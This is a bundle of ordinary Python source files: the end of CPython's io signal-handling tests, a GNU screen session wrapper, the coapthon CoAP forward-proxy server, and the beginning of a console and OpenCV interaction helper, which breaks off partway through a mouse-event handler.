signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
@unittest.skipIf(sys.platform in ('freebsd5', 'freebsd6', 'freebsd7'),
'issue #12429: skip test on FreeBSD <= 7')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
# XXX This test has three flaws that appear when objects are
# XXX not reference counted.
# - if wio.write() happens to trigger a garbage collection,
# the signal exception may be raised when some __del__
# method is running; it will not reach the assertRaises()
# call.
# - more subtle, if the wio object is not destroyed at once
# and survives this function, the next opened file is likely
# to have the same fileno (since the file descriptor was
# actively closed). When wio.__del__ is finally called, it
# will close the other's test file... To trigger this with
# CPython, try adding "global wio" in this function.
# - This happens only for streams created by the _pyio module,
# because a wio.close() that fails still considers that the
# file needs to be closed again. You can try adding an
# "assert wio.closed" at the end of the function.
# Fortunately, a little gc.collect() seems to be enough to
# work around all these issues.
support.gc_collect()
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
signal.alarm(1)
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
self.assertRaises(ZeroDivisionError,
wio.write, item * (1024 * 1024))
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = 1024 * 1024
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
def _read():
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def test_main():
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
screenutils.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Note: this may not work with bpython, use python 2.6 or higher
# Author: Christophe Narbonne
# Contrib: Alexis Metaireau
from subprocess import getoutput
from multiprocessing import Process
from os import system
from time import sleep
def list_screens():
"""List all the existing screens and build a Screen instance for each
"""
return [Screen(".".join(l.split(".")[1:]).split("\t")[0])
for l in getoutput("screen -ls | grep -P '\t'").split('\n')]
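# Illustrative note (not from the original module): given the sample line
# "\t28062.G.Terminal\t(Detached)" from `screen -ls`, the parsing above yields
# the session name "G.Terminal". The exact output format can vary between
# screen versions, so this is an assumption about typical output.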
class ScreenNotFoundError(Exception):
"""raised when the screen does not exists"""
class Screen(object):
"""Represents a gnu-screen object::
>>> s=Screen("screenName", create=True)
>>> s.name
'screenName'
>>> s.exists
True
>>> s.state
>>> s.send_commands("man -k keyboard")
>>> s.kill()
>>> s.exists
False
"""
def __init__(self, name, create=False):
self.name = name
self._id = None
self._status = None
if create:
self.create()
@property
def id(self):
"""return the identifier of the screen"""
if not self._id:
self._set_screen_infos()
return self._id
@property
def status(self):
"""return the status of the screen"""
self._set_screen_infos()
return self._status
@property
def exists(self):
"""Tell if the screen session exists or not."""
# output line sample:
# " 28062.G.Terminal (Detached)"
lines = getoutput("screen -ls | grep " + self.name).split('\n')
return self.name in [".".join(l.split(".")[1:]).split("\t")[0]
for l in lines]
def create(self):
"""create a screen, if does not exists yet"""
if not self.exists:
Process(target=self._delayed_detach).start()
system('screen -UR ' + self.name)
def interrupt(self):
"""Insert CTRL+C in the screen session"""
self._check_exists()
system("screen -x " + self.name + " -X eval \"stuff \\003\"")
def kill(self):
"""Kill the screen applications then quit the screen"""
self._check_exists()
system('screen -x ' + self.name + ' -X quit')
def detach(self):
"""detach the screen"""
self._check_exists()
system("screen -d " + self.name)
def _delayed_detach(self):
sleep(5)
self.detach()
def send_commands(self, commands):
"""send commands to the active gnu-screen"""
self._check_exists()
for command in commands:
sleep(0.02)
print(command)
system('screen -x ' + self.name + ' -X stuff "' + command + '" ')
sleep(0.02)
system('screen -x ' + self.name + ' -X eval "stuff \\015" ')
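# Illustrative note: the octal escape \015 is a carriage return, so the
# "eval stuff \015" call above effectively presses Enter after each command.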
def _check_exists(self, message="Error code: 404"):
"""check whereas the screen exist. if not, raise an exception"""
if not self.exists:
raise ScreenNotFoundError(message)
def _set_screen_infos(self):
"""set the screen information related parameters"""
if self.exists:
infos = getoutput("screen -ls | grep %s" % self.name).split('\t')[1:]
self._id = infos[0].split('.')[0]
self._date = infos[1][1:-1]
self._status = infos[2][1:-1]
def __repr__(self):
return "<%s '%s'>" % (self.__class__.__name__, self.name)
|
coap.py
|
import logging.config
import random
import socket
import struct
import threading
import os
from coapthon import defines
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.cachelayer import CacheLayer
from coapthon.layers.forwardLayer import ForwardLayer
from coapthon.layers.messagelayer import MessageLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.resourcelayer import ResourceLayer
from coapthon.messages.message import Message
from coapthon.messages.request import Request
from coapthon.resources.resource import Resource
from coapthon.serializer import Serializer
from coapthon.utils import Tree, create_logging
__author__ = 'Giacomo Tanganelli'
if not os.path.isfile("logging.conf"):
create_logging()
logger = logging.getLogger(__name__)
logging.config.fileConfig("logging.conf", disable_existing_loggers=False)
class CoAP(object):
"""
Implementation of the Forward Proxy
"""
def __init__(self, server_address, multicast=False, starting_mid=None, cache=False, sock=None):
"""
Initialize the Forward Proxy.
:param server_address: Server address for incoming connections
:param multicast: if the ip is a multicast address
:param starting_mid: used for testing purposes
:param cache: if a cache must be used
:param sock: if a socket has been created externally, it can be used directly
"""
self.stopped = threading.Event()
self.stopped.clear()
self.to_be_stopped = []
self.purge_thread = threading.Thread(target=self.purge)
self.purge_thread.start()
self.cache_enable = cache
self._messageLayer = MessageLayer(starting_mid)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
if self.cache_enable:
self._cacheLayer = CacheLayer(defines.FORWARD_PROXY)
else:
self._cacheLayer = None
self._forwardLayer = ForwardLayer(self)
self.resourceLayer = ResourceLayer(self)
# Resource directory
root = Resource('root', self, visible=False, observable=False, allow_children=True)
root.path = '/'
self.root = Tree()
self.root["/"] = root
self._serializer = None
self.server_address = server_address
self.multicast = multicast
addrinfo = socket.getaddrinfo(self.server_address[0], None)[0]
if sock is not None:
# Use given socket, could be a DTLS socket
self._socket = sock
elif self.multicast: # pragma: no cover
# Create a socket
# self._socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, 255)
# self._socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_LOOP, 1)
# Join group
if addrinfo[0] == socket.AF_INET: # IPv4
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Allow multiple copies of this program on one machine
# (not strictly needed)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind((defines.ALL_COAP_NODES, self.server_address[1]))
mreq = struct.pack("4sl", socket.inet_aton(defines.ALL_COAP_NODES), socket.INADDR_ANY)
self._socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
self._unicast_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._unicast_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._unicast_socket.bind(self.server_address)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Allow multiple copies of this program on one machine
# (not strictly needed)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind((defines.ALL_COAP_NODES_IPV6, self.server_address[1]))
addrinfo_multicast = socket.getaddrinfo(defines.ALL_COAP_NODES_IPV6, 5683)[0]
group_bin = socket.inet_pton(socket.AF_INET6, addrinfo_multicast[4][0])
mreq = group_bin + struct.pack('@I', 0)
self._socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
self._unicast_socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._unicast_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._unicast_socket.bind(self.server_address)
else:
if addrinfo[0] == socket.AF_INET: # IPv4
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind(self.server_address)
def purge(self):
"""
Clean old transactions
"""
while not self.stopped.isSet():
self.stopped.wait(timeout=defines.EXCHANGE_LIFETIME)
self._messageLayer.purge()
def listen(self, timeout=10):
"""
Listen for incoming messages. Timeout is used to check if the server must be switched off.
:param timeout: Socket Timeout in seconds
"""
self._socket.settimeout(float(timeout))
while not self.stopped.isSet():
try:
data, client_address = self._socket.recvfrom(4096)
except socket.timeout:
continue
try:
# Start a new thread so that other requests are not blocked
args = ((data, client_address), )
t = threading.Thread(target=self.receive_datagram, args=args)
t.daemon = True
t.start()
except RuntimeError:
print "Exception with Executor"
print "closing socket"
self._socket.close()
def close(self):
"""
Stop the server.
"""
logger.info("Stop server")
self.stopped.set()
for event in self.to_be_stopped:
event.set()
self._socket.close()
def receive_datagram(self, args):
"""
Handle messages coming from the udp socket.
:param args: (data, client_address)
"""
data, client_address = args
print "receiving datagram"
try:
host, port = client_address
except ValueError:
host, port, tmp1, tmp2 = client_address
client_address = (host, port)
serializer = Serializer()
message = serializer.deserialize(data, client_address)
if isinstance(message, int):
logger.error("receive_datagram - BAD REQUEST")
rst = Message()
rst.destination = client_address
rst.type = defines.Types["RST"]
rst.code = message
self.send_datagram(rst)
return
logger.debug("receive_datagram - " + str(message))
if isinstance(message, Request):
transaction = self._messageLayer.receive_request(message)
if transaction.request.duplicated and transaction.completed:
logger.debug("message duplicated,transaction completed")
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
transaction = self._messageLayer.send_response(transaction)
self.send_datagram(transaction.response)
return
elif transaction.request.duplicated and not transaction.completed:
logger.debug("message duplicated,transaction NOT completed")
self._send_ack(transaction)
return
transaction.separate_timer = self._start_separate_timer(transaction)
transaction = self._blockLayer.receive_request(transaction)
if transaction.block_transfer:
self._stop_separate_timer(transaction.separate_timer)
transaction = self._messageLayer.send_response(transaction)
self.send_datagram(transaction.response)
return
transaction = self._observeLayer.receive_request(transaction)
"""
call to the cache layer to check if there's a cached response for the request
if not, call the forward layer
"""
if self._cacheLayer is not None:
transaction = self._cacheLayer.receive_request(transaction)
if transaction.cacheHit is False:
print(transaction.request)
transaction = self._forwardLayer.receive_request(transaction)
print(transaction.response)
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
transaction = self._cacheLayer.send_response(transaction)
else:
transaction = self._forwardLayer.receive_request(transaction)
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
self._stop_separate_timer(transaction.separate_timer)
transaction = self._messageLayer.send_response(transaction)
if transaction.response is not None:
if transaction.response.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.response)
self.send_datagram(transaction.response)
elif isinstance(message, Message):
transaction = self._messageLayer.receive_empty(message)
if transaction is not None:
transaction = self._blockLayer.receive_empty(message, transaction)
self._observeLayer.receive_empty(message, transaction)
else: # is Response
logger.error("Received response from %s", message.source)
def send_datagram(self, message):
"""
Send a message through the udp socket.
:type message: Message
:param message: the message to send
"""
if not self.stopped.isSet():
host, port = message.destination
logger.debug("send_datagram - " + str(message))
serializer = Serializer()
message = serializer.serialize(message)
self._socket.sendto(message, (host, port))
def _start_retransmission(self, transaction, message):
"""
Start the retransmission task.
:type transaction: Transaction
:param transaction: the transaction that owns the message that needs retransmission
:type message: Message
:param message: the message that needs the retransmission task
"""
with transaction:
if message.type == defines.Types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
args=(transaction, message, future_time, 0))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread.start()
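# Note on the retransmission schedule (illustrative, assuming the RFC 7252
# default values ACK_TIMEOUT = 2 s, ACK_RANDOM_FACTOR = 1.5 and
# MAX_RETRANSMIT = 4; the actual numbers come from coapthon.defines):
# the initial wait is drawn uniformly from [2 s, 3 s] and is doubled by
# _retransmit() after every attempt, e.g. with an initial draw of 2.5 s the
# successive waits are roughly 2.5, 5, 10 and 20 seconds before the message
# is given up on.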
def _retransmit(self, transaction, message, future_time, retransmit_count):
"""
Thread function to retransmit the message in the future
:param transaction: the transaction that owns the message that needs retransmission
:param message: the message that needs the retransmission task
:param future_time: the amount of time to wait before a new attempt
:param retransmit_count: the number of retransmissions
"""
with transaction:
while retransmit_count < defines.MAX_RETRANSMIT and (not message.acknowledged and not message.rejected) \
and not self.stopped.isSet():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not self.stopped.isSet():
retransmit_count += 1
future_time *= 2
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
if message.observe is not None:
self._observeLayer.remove_subscriber(message)
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
def _start_separate_timer(self, transaction):
"""
Start a thread to handle separate mode.
:type transaction: Transaction
:param transaction: the transaction that is in processing
:rtype : the Timer object
"""
t = threading.Timer(defines.ACK_TIMEOUT, self._send_ack, (transaction,))
t.start()
return t
@staticmethod
def _stop_separate_timer(timer):
"""
Stop the separate Thread if an answer has been already provided to the client.
:param timer: The Timer object
"""
timer.cancel()
def _send_ack(self, transaction):
"""
Sends an ACK message for the request.
:param transaction: the transaction that owns the request
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.request.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.request, ack)
self.send_datagram(ack)
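# Minimal usage sketch (illustrative; assumes a valid "logging.conf" is present
# and that the coapthon defaults are used):
#
#   proxy = CoAP(("0.0.0.0", 5683))
#   try:
#       proxy.listen(timeout=10)
#   except KeyboardInterrupt:
#       proxy.close()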
|
interact.py
|
import multiprocessing
import os
import sys
import threading
import time
import types
import colorama
import cv2
import numpy as np
from tqdm import tqdm
from core import stdex
is_colab = 'COLAB_GPU' in os.environ # Check if we are in a Google Colab environment
yn_str = {True:'y',False:'n'}
class InteractBase(object):
EVENT_LBUTTONDOWN = 1
EVENT_LBUTTONUP = 2
EVENT_MBUTTONDOWN = 3
EVENT_MBUTTONUP = 4
EVENT_RBUTTONDOWN = 5
EVENT_RBUTTONUP = 6
EVENT_MOUSEWHEEL = 10
def __init__(self):
self.named_windows = {}
self.capture_mouse_windows = {}
self.capture_keys_windows = {}
self.mouse_events = {}
self.key_events = {}
self.pg_bar = None
self.focus_wnd_name = None
self.error_log_line_prefix = '/!\\ '
self.process_messages_callbacks = {}
def is_support_windows(self):
return False
def is_colab(self):
return False
def on_destroy_all_windows(self):
raise NotImplementedError
def on_create_window (self, wnd_name):
raise NotImplementedError
def on_destroy_window (self, wnd_name):
raise NotImplementedError
def on_show_image (self, wnd_name, img):
raise NotImplementedError
def on_capture_mouse (self, wnd_name):
raise NotImplementedError
def on_capture_keys (self, wnd_name):
raise NotImplementedError
def on_process_messages(self, sleep_time=0):
raise NotImplementedError
def on_wait_any_key(self):
raise NotImplementedError
def log_info(self, msg, end='\n'):
if self.pg_bar is not None:
print ("\n")
print (msg, end=end)
def log_err(self, msg, end='\n'):
if self.pg_bar is not None:
print ("\n")
print (f'{self.error_log_line_prefix}{msg}', end=end)
def named_window(self, wnd_name):
if wnd_name not in self.named_windows:
#we will show window only on first show_image
self.named_windows[wnd_name] = 0
self.focus_wnd_name = wnd_name
else: print("named_window: ", wnd_name, " already created.")
def destroy_all_windows(self):
if len( self.named_windows ) != 0:
self.on_destroy_all_windows()
self.named_windows = {}
self.capture_mouse_windows = {}
self.capture_keys_windows = {}
self.mouse_events = {}
self.key_events = {}
self.focus_wnd_name = None
def destroy_window(self, wnd_name):
if wnd_name in self.named_windows:
self.on_destroy_window(wnd_name)
self.named_windows.pop(wnd_name)
if wnd_name == self.focus_wnd_name:
self.focus_wnd_name = list(self.named_windows.keys())[-1] if len( self.named_windows ) != 0 else None
if wnd_name in self.capture_mouse_windows:
self.capture_mouse_windows.pop(wnd_name)
if wnd_name in self.capture_keys_windows:
self.capture_keys_windows.pop(wnd_name)
if wnd_name in self.mouse_events:
self.mouse_events.pop(wnd_name)
if wnd_name in self.key_events:
self.key_events.pop(wnd_name)
def show_image(self, wnd_name, img):
if wnd_name in self.named_windows:
if self.named_windows[wnd_name] == 0:
self.named_windows[wnd_name] = 1
self.on_create_window(wnd_name)
if wnd_name in self.capture_mouse_windows:
self.capture_mouse(wnd_name)
self.on_show_image(wnd_name,img)
else: print("show_image: named_window ", wnd_name, " not found.")
def capture_mouse(self, wnd_name):
if wnd_name in self.named_windows:
self.capture_mouse_windows[wnd_name] = True
if self.named_windows[wnd_name] == 1:
self.on_capture_mouse(wnd_name)
else: print("capture_mouse: named_window ", wnd_name, " not found.")
def capture_keys(self, wnd_name):
if wnd_name in self.named_windows:
if wnd_name not in self.capture_keys_windows:
self.capture_keys_windows[wnd_name] = True
self.on_capture_keys(wnd_name)
else: print("capture_keys: already set for window ", wnd_name)
else: print("capture_keys: named_window ", wnd_name, " not found.")
def progress_bar(self, desc, total, leave=True, initial=0):
if self.pg_bar is None:
self.pg_bar = tqdm( total=total, desc=desc, leave=leave, ascii=True, initial=initial )
else: print("progress_bar: already set.")
def progress_bar_inc(self, c):
if self.pg_bar is not None:
self.pg_bar.n += c
self.pg_bar.refresh()
else: print("progress_bar not set.")
def progress_bar_close(self):
if self.pg_bar is not None:
self.pg_bar.close()
self.pg_bar = None
else: print("progress_bar not set.")
def progress_bar_generator(self, data, desc=None, leave=True, initial=0):
self.pg_bar = tqdm( data, desc=desc, leave=leave, ascii=True, initial=initial )
for x in self.pg_bar:
yield x
self.pg_bar.close()
self.pg_bar = None
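# Illustrative example (not part of the original module): the generator wraps
# any iterable in a tqdm progress bar, e.g.
#   for path in io.progress_bar_generator(image_paths, "Loading"):
#       process(path)
# where `io` is an instance of this class (for example the module-level
# `interact` object) and `image_paths` / `process` are placeholders.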
def add_process_messages_callback(self, func ):
tid = threading.get_ident()
callbacks = self.process_messages_callbacks.get(tid, None)
if callbacks is None:
callbacks = []
self.process_messages_callbacks[tid] = callbacks
callbacks.append ( func )
def process_messages(self, sleep_time=0):
callbacks = self.process_messages_callbacks.get(threading.get_ident(), None)
if callbacks is not None:
for func in callbacks:
func()
self.on_process_messages(sleep_time)
def wait_any_key(self):
self.on_wait_any_key()
def add_mouse_event(self, wnd_name, x, y, ev, flags):
if wnd_name not in self.mouse_events:
self.mouse_events[wnd_name] = []
self.mouse_events[wnd_name] += [ (x, y, ev, flags) ]
def add_key_event(self, wnd_name, ord_key, ctrl_pressed, alt_pressed, shift_pressed):
if wnd_name not in self.key_events:
self.key_events[wnd_name] = []
self.key_events[wnd_name] += [ (ord_key, chr(ord_key) if ord_key <= 255 else chr(0), ctrl_pressed, alt_pressed, shift_pressed) ]
def get_mouse_events(self, wnd_name):
ar = self.mouse_events.get(wnd_name, [])
self.mouse_events[wnd_name] = []
return ar
def get_key_events(self, wnd_name):
ar = self.key_events.get(wnd_name, [])
self.key_events[wnd_name] = []
return ar
def input(self, s):
return input(s)
def input_number(self, s, default_value, valid_list=None, show_default_value=True, add_info=None, help_message=None):
if show_default_value and default_value is not None:
s = f"[{default_value}] {s}"
if add_info is not None or \
help_message is not None:
s += " ("
if add_info is not None:
s += f" {add_info}"
if help_message is not None:
s += " ?:help"
if add_info is not None or \
help_message is not None:
s += " )"
s += " : "
while True:
try:
inp = input(s)
if len(inp) == 0:
result = default_value
break
if help_message is not None and inp == '?':
print (help_message)
continue
i = float(inp)
if (valid_list is not None) and (i not in valid_list):
result = default_value
break
result = i
break
except:
result = default_value
break
print(result)
return result
def input_int(self, s, default_value, valid_range=None, valid_list=None, add_info=None, show_default_value=True, help_message=None):
if show_default_value:
if len(s) != 0:
s = f"[{default_value}] {s}"
else:
s = f"[{default_value}]"
if add_info is not None or \
valid_range is not None or \
help_message is not None:
s += " ("
if valid_range is not None:
s += f" {valid_range[0]}-{valid_range[1]}"
if add_info is not None:
s += f" {add_info}"
if help_message is not None:
s += " ?:help"
if add_info is not None or \
valid_range is not None or \
help_message is not None:
s += " )"
s += " : "
while True:
try:
inp = input(s)
if len(inp) == 0:
raise ValueError("")
if help_message is not None and inp == '?':
print (help_message)
continue
i = int(inp)
if valid_range is not None:
i = int(np.clip(i, valid_range[0], valid_range[1]))
if (valid_list is not None) and (i not in valid_list):
i = default_value
result = i
break
except:
result = default_value
break
print (result)
return result
def input_bool(self, s, default_value, help_message=None):
s = f"[{yn_str[default_value]}] {s} ( y/n"
if help_message is not None:
s += " ?:help"
s += " ) : "
while True:
try:
inp = input(s)
if len(inp) == 0:
raise ValueError("")
if help_message is not None and inp == '?':
print (help_message)
continue
return bool ( {"y":True,"n":False}.get(inp.lower(), default_value) )
except:
print ( "y" if default_value else "n" )
return default_value
def input_str(self, s, default_value=None, valid_list=None, show_default_value=True, help_message=None):
if show_default_value and default_value is not None:
s = f"[{default_value}] {s}"
if valid_list is not None or \
help_message is not None:
s += " ("
if valid_list is not None:
s += " " + "/".join(valid_list)
if help_message is not None:
s += " ?:help"
if valid_list is not None or \
help_message is not None:
s += " )"
s += " : "
while True:
try:
inp = input(s)
if len(inp) == 0:
if default_value is None:
print("")
return None
result = default_value
break
if help_message is not None and inp == '?':
print(help_message)
continue
if valid_list is not None:
if inp.lower() in valid_list:
result = inp.lower()
break
if inp in valid_list:
result = inp
break
continue
result = inp
break
except:
result = default_value
break
print(result)
return result
def input_process(self, stdin_fd, sq, str):
sys.stdin = os.fdopen(stdin_fd)
try:
inp = input (str)
sq.put (True)
except:
sq.put (False)
def input_in_time (self, str, max_time_sec):
sq = multiprocessing.Queue()
p = multiprocessing.Process(target=self.input_process, args=( sys.stdin.fileno(), sq, str))
p.daemon = True
p.start()
t = time.time()
inp = False
while True:
if not sq.empty():
inp = sq.get()
break
if time.time() - t > max_time_sec:
break
p.terminate()
p.join()
old_stdin = sys.stdin
sys.stdin = os.fdopen( os.dup(sys.stdin.fileno()) )
old_stdin.close()
return inp
def input_process_skip_pending(self, stdin_fd):
sys.stdin = os.fdopen(stdin_fd)
while True:
try:
if sys.stdin.isatty():
sys.stdin.read()
except:
pass
def input_skip_pending(self):
if is_colab:
# currently it does not work on Colab
return
"""
skips unnecessary inputs between the dialogs
"""
p = multiprocessing.Process(target=self.input_process_skip_pending, args=( sys.stdin.fileno(), ))
p.daemon = True
p.start()
time.sleep(0.5)
p.terminate()
p.join()
sys.stdin = os.fdopen( sys.stdin.fileno() )
class InteractDesktop(InteractBase):
def __init__(self):
colorama.init()
super().__init__()
def color_red(self):
pass
def is_support_windows(self):
return True
def on_destroy_all_windows(self):
cv2.destroyAllWindows()
def on_create_window (self, wnd_name):
cv2.namedWindow(wnd_name)
def on_destroy_window (self, wnd_name):
cv2.destroyWindow(wnd_name)
def on_show_image (self, wnd_name, img):
cv2.imshow (wnd_name, img)
def on_capture_mouse (self, wnd_name):
self.last_xy = (0,0)
def onMouse(event, x, y, flags, param):
(inst, wnd_name) = param
if event == cv2.EVENT_LBUTTONDOWN: ev = InteractBase.EVENT_LBUTTONDOWN
elif event == cv2.EVENT_LBUTTONUP: ev = InteractBase.EVENT_LBUTTONUP
elif event == cv2.EVENT_RBUTTONDOWN: ev = InteractBase.EVENT_RBUTTONDOWN
elif event == cv2.EVENT_RBUTTONUP: ev = InteractBase.EVENT_RBUTTONUP
elif event == cv2.EVENT_MBUTTONDOWN: ev = InteractBase.EVENT_MBUTTONDOWN
elif event == cv2.EVENT_MBUTTONUP: ev = InteractBase.EVENT_MBUTTONUP
elif event == cv2.EVENT_MOUSEWHEEL:
ev = InteractBase.EVENT_MOUSEWHEEL
x,y = self.last_xy # fix OpenCV bug when the window size is larger than the screen size
else: ev = 0
self.last_xy = (x,y)
inst.add_mouse_event (wnd_name, x, y, ev, flags)
